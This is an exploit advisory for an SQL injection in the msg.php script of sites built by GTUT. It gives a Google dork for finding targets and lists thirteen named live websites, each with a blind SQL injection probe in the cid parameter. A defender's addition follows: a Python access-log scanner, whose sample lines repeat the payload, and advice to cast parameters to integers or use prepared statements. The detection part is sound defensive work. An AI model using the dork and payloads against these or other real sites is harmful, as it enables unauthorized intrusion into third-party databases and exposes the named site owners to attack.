######################
# Exploit Title : Design by GTUT SQL Injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.gtut.com.tw/
# Google Dork : intext:"Design by GTUT" msg.php
# Date: 28 01 2016
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
#
# demos :
# http://www.flweb.com.tw/exec/msg.php?mid=1&cid=3 and(version() regexp CHAR/**/(94, 53))&mod=show&pid=13&lg=T
# http://www.kmfsports.com/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.dacosemi.com.tw/exec/msg.php?mid=4&cid=4%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.ckoptics.com/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg&lg=E
# http://www.rato.tw/exec/msg.php?mid=6&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&pid=6&lg=E
# http://www.stingray.com.tw/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.nuzon.com.tw/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.cyelectronic.com.tw/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.tongson.com.tw/exec/msg.php?mid=3&cid=3%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.lampweb.com.tw/exec/msg.php?mid=3&cid=3%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.songjin.com.tw/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=T
# http://www.chiemei.com/exec/msg.php?lg=E&mid=14&cid=3%20and(version()%20regexp%20CHAR/**/(94,%2053))
# http://www.ygget.com/exec/msg.php?off=1&mid=36&cid=18%20and(version()%20regexp%20CHAR/**/(94,%2053))&pid=18&lg=S
######################
# discovered by : modiret
######################
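
For defenders, an added example (not part of the original advisory) that flags this probe in web server access logs. In the demo URLs the numeric `cid` parameter of `msg.php` carries `and(version() regexp CHAR/**/(94, 53))`, where `CHAR(94, 53)` is the string `^5` and `/**/` is an empty SQL comment. The log lines, client addresses and the choice of `mid`, `cid`, `pid` and `off` as integer-only parameters are assumptions made for the example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Assumption: these msg.php parameters are plain integers in legitimate use.
NUMERIC_PARAMS = {"mid", "cid", "pid", "off"}
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation-range client addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Jan/2016:10:00:01 +0000] "GET /exec/msg.php?mid=2&cid=2&lg=E HTTP/1.1" 200 5120',
    '198.51.100.7 - - [28/Jan/2016:10:00:05 +0000] "GET /exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E HTTP/1.1" 200 5120',
    '198.51.100.7 - - [28/Jan/2016:10:00:09 +0000] "GET /exec/msg.php?lg=E&mid=14&cid=3%20and(version()%20regexp%20CHAR/**/(94,%2053)) HTTP/1.1" 200 5120',
    '192.0.2.11 - - [28/Jan/2016:10:00:12 +0000] "GET /exec/msg.php?lg=E&mid=14&cid=3 HTTP/1.1" 200 4096',
]

def normalize(value):
    """Decode leftover URL-encoding, drop /* */ comments, lowercase."""
    for _ in range(3):  # bounded, so a crafted value cannot loop forever
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return INLINE_COMMENT.sub("", value).strip().lower()

def suspicious_params(target):
    """Return {param: normalized value} for numeric msg.php parameters that are not integers."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/msg.php"):
        return {}
    hits = {}
    for name, raw in parse_qsl(parts.query):
        value = normalize(raw)
        if name.lower() in NUMERIC_PARAMS and not (value.isascii() and value.isdigit()):
            hits[name.lower()] = value
    return hits

def scan(lines):
    """Return [(client_ip, hits)] for log lines whose numeric parameters hold non-integers."""
    findings = []
    for line in lines:
        m = REQUEST.search(line)
        hits = suspicious_params(m.group(1)) if m else {}
        if hits:
            findings.append((line.split()[0], hits))
    return findings

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG):
        print(client, hits)
```

Log matching only finds probes after the fact. The fix belongs in `msg.php` itself: cast these parameters to integers or pass them to the database as bound parameters of a prepared statement.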